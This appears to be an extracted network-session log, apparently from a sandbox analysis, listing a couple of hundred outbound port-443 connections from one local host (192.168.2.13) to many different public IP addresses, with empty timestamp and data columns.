                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23715192.168.2.133312698.211.240.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23716192.168.2.1347180204.129.159.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23717192.168.2.1350564106.125.59.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23718192.168.2.1358712173.121.21.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23719192.168.2.1356482187.251.248.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23720192.168.2.133480896.22.26.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23721192.168.2.1354168105.239.101.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23722192.168.2.1354032153.109.126.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23723192.168.2.1338930129.18.81.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23724192.168.2.1360758116.249.123.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23725192.168.2.134070252.34.134.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23726192.168.2.1349616167.247.23.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23727192.168.2.1352724182.82.12.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23728192.168.2.1336238119.224.75.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23729192.168.2.133667699.190.228.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23730192.168.2.135352672.181.86.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23731192.168.2.134872489.76.128.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23732192.168.2.1341278111.0.163.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23733192.168.2.1351544163.195.237.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23734192.168.2.135900264.69.215.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23735192.168.2.135731057.126.116.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23736192.168.2.1348470189.89.114.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23737192.168.2.1343394187.100.111.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23738192.168.2.1357132153.208.239.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23739192.168.2.1357248172.149.22.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23740192.168.2.1358632124.175.184.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23741192.168.2.135864427.90.101.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23742192.168.2.1342066103.159.90.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23743192.168.2.135886836.233.196.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23744192.168.2.134511661.180.223.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23745192.168.2.1351766160.146.123.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23746192.168.2.1340320204.19.149.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23747192.168.2.1351396104.255.57.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23748192.168.2.1337874176.110.36.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23749192.168.2.1350988101.250.228.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23750192.168.2.1334988131.229.83.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23751192.168.2.1355960116.34.104.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23752192.168.2.1360384124.244.217.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23753192.168.2.1358364139.60.203.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23754192.168.2.134393217.161.171.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23755192.168.2.1359292177.118.19.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23756192.168.2.1336588102.215.31.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23757192.168.2.135386464.88.227.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23758192.168.2.1335660123.20.173.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23759192.168.2.1340806111.7.147.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23760192.168.2.1340874200.50.86.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23761192.168.2.135534088.55.1.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23762192.168.2.133653483.63.172.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23763192.168.2.133748667.93.154.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23764192.168.2.1336538149.228.54.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23765192.168.2.133584487.7.246.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23766192.168.2.135547265.48.187.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23767192.168.2.1343356155.235.137.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23768192.168.2.1336874107.49.24.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23769192.168.2.133540262.166.87.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23770192.168.2.134411862.87.206.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23771192.168.2.134987285.248.244.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23772192.168.2.1343928117.213.202.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23773192.168.2.1334272181.49.59.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23774192.168.2.135856039.95.19.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23775192.168.2.1360846100.12.191.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23776192.168.2.1351226131.195.75.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23777192.168.2.135814676.148.71.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23778192.168.2.135058439.68.17.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23779192.168.2.1355374139.223.178.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23780192.168.2.1335558165.2.70.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23781192.168.2.1354928156.176.158.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23782192.168.2.1338358139.230.214.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23783192.168.2.1343180173.107.254.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23784192.168.2.135286687.139.98.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23785192.168.2.1334384126.239.85.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23786192.168.2.1341304143.177.182.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23787192.168.2.133646012.91.85.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23788192.168.2.133760682.173.72.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23789192.168.2.1360728135.247.170.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23790192.168.2.133573883.69.61.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23791192.168.2.1346430154.114.217.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23792192.168.2.133420435.129.33.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23793192.168.2.136022443.119.135.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23794192.168.2.134921076.30.143.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23795192.168.2.1341444173.179.143.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23796192.168.2.1349340193.41.42.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23797192.168.2.1352560124.234.176.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23798192.168.2.133327861.110.109.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23799192.168.2.1344924121.11.74.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23800192.168.2.1347730120.24.211.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23801192.168.2.1344276217.149.68.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23802192.168.2.1348556138.141.127.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23803192.168.2.1339432151.165.129.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23804192.168.2.1360758192.223.208.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23805192.168.2.1355352107.18.180.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23806192.168.2.133351069.110.118.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23807192.168.2.1358896164.158.11.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23808192.168.2.1352424156.171.184.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23809192.168.2.1335546188.103.73.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23810192.168.2.1359390129.213.200.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23811192.168.2.1346078216.50.220.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23812192.168.2.1341316195.170.156.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23813192.168.2.1337748136.54.42.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23814192.168.2.1336920183.182.184.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23815192.168.2.1349260133.130.172.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23816192.168.2.135890625.51.181.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23817192.168.2.1339714151.62.120.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23818192.168.2.133433698.147.113.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23819192.168.2.134517845.174.199.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23820192.168.2.134690083.252.87.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23821192.168.2.1355794111.129.152.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23822192.168.2.1358748202.58.58.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23823192.168.2.1338148170.241.235.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23824192.168.2.135938080.119.102.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23825192.168.2.135517074.181.93.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23826192.168.2.133496681.98.139.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23827192.168.2.1343932131.244.194.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23828192.168.2.1338664180.243.241.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23829192.168.2.133656649.165.60.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23830192.168.2.1341122211.227.231.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23831192.168.2.1333904101.103.53.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23832192.168.2.1351960155.155.233.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23833192.168.2.133906889.100.150.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23834192.168.2.133885094.30.26.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23835192.168.2.135828294.178.211.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23836192.168.2.1347932146.187.216.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23837192.168.2.1339008203.175.242.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23838192.168.2.1349106166.37.83.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23839192.168.2.1335322161.10.72.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23840192.168.2.1336248207.252.166.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23841192.168.2.1343160119.26.172.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23842192.168.2.1360360151.27.126.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23843192.168.2.133571061.139.31.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23844192.168.2.1355848126.28.127.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23845192.168.2.133891039.93.111.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23846192.168.2.135705262.79.55.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23847192.168.2.1359670196.95.125.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23848192.168.2.1341510160.244.130.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23849192.168.2.1359534164.92.191.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23850192.168.2.1349450195.114.132.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23851192.168.2.1350760207.69.233.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23852192.168.2.135381653.248.45.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23853192.168.2.134218642.143.143.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23854192.168.2.1344380107.86.189.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23855192.168.2.1360032175.122.247.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23856192.168.2.134455625.63.252.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23857192.168.2.1355302204.215.66.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23858192.168.2.1332938157.247.244.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23859192.168.2.134983818.177.211.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23860192.168.2.133738614.96.82.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23861192.168.2.1335230208.120.35.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23862192.168.2.133935237.92.1.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23863192.168.2.1350044147.165.49.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23864192.168.2.1341216120.155.178.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23865192.168.2.135248879.116.154.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23866192.168.2.1356068169.250.1.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23867192.168.2.1345010143.178.107.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23868192.168.2.135977278.73.54.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23869192.168.2.135682447.209.179.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23870192.168.2.134912061.28.194.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23871192.168.2.133442837.39.70.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23872192.168.2.134725291.70.226.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23873192.168.2.1349814199.123.146.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23874192.168.2.1336912117.164.17.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23875192.168.2.135335454.3.38.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23876192.168.2.135553240.123.191.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23877192.168.2.1350380213.163.26.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23878192.168.2.1359458199.13.82.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23879192.168.2.134756696.56.28.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23880192.168.2.133507246.249.189.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23881192.168.2.1337302151.180.245.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23882192.168.2.135514057.191.164.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23883192.168.2.1333250173.232.219.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23884192.168.2.135227883.200.151.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23885192.168.2.1339188129.178.251.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23886192.168.2.1356694180.26.82.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23887192.168.2.1339570169.72.221.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23888192.168.2.133720838.0.127.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23889192.168.2.1351076179.249.136.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23890192.168.2.1342212143.67.109.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23891192.168.2.1340852209.254.41.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23892192.168.2.134939682.245.231.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23893192.168.2.133668851.227.232.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23894192.168.2.134840424.129.30.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23895192.168.2.1342812138.115.228.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23896192.168.2.1352838222.222.47.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23897192.168.2.1354540121.35.99.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23898192.168.2.134870824.5.110.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23899192.168.2.1336978184.111.6.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23900192.168.2.1333668201.176.247.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23901192.168.2.1356392155.225.217.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23902192.168.2.135556498.75.164.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23903192.168.2.134936043.106.8.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23904192.168.2.133854844.148.29.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23905192.168.2.1340252165.24.11.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23906192.168.2.1351788222.248.93.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23907192.168.2.1341588114.175.205.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23908192.168.2.135640884.228.36.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23909192.168.2.135816259.173.154.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23910192.168.2.1357460165.210.0.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23911192.168.2.13521165.228.240.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23912192.168.2.1340582156.10.85.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23913192.168.2.134026668.136.23.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23914192.168.2.135360466.95.177.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23915192.168.2.1333254193.49.61.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23916192.168.2.1332774118.210.70.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23917192.168.2.1351230153.111.173.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23918192.168.2.135898489.4.67.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23919192.168.2.1359618208.127.254.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23920192.168.2.1352658107.97.244.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23921192.168.2.134639218.91.105.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23922192.168.2.133285243.135.169.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23923192.168.2.134737439.156.77.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23924192.168.2.1338028123.110.91.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23925192.168.2.1336706198.47.189.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23926192.168.2.135417478.38.245.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23927192.168.2.135140266.66.189.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23928192.168.2.1360970102.129.16.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23929192.168.2.13458021.101.56.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23930192.168.2.1336130124.52.34.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23931192.168.2.1340084122.247.181.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23932192.168.2.1352778126.198.50.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23933192.168.2.134521644.243.204.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23934192.168.2.1336876222.244.205.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23935192.168.2.135776845.231.217.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23936192.168.2.1346730204.67.171.159443
